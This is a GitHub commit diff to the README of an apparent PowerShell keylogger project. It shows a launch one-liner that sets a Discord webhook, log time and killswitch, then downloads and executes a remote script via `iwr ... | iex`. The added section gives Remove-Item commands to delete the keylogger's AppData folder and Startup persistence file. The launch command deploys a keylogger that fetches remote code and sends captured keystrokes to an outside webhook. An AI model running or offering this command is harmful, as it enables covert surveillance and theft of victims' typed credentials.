Update README.md

This commit is contained in:
I-Am-Jakoby 2022-12-25 10:26:38 -06:00 committed by GitHub
parent 0533d1d1d2
commit 87617e0cd7
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -69,6 +69,14 @@ Calling the script with both a `log` time and `killswitch` will look something l
```
$dc='https://link.iamjakoby.com/xxxx';$log="09:00 pm";$ks="12/25/2022 10:00:00 PM";iwr "https://jakoby.lol/m2m" | iex
```
### DELETING THE KEYLOGGER
You can use the following code to delete the keylogger
Or manually from those locations
Remove-Item "$env:appdata\-locker" -Recurse -Force;
Remove-Item "$env:userprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\-p.cmd"
<p align="right">(<a href="#top">back to top</a>)</p>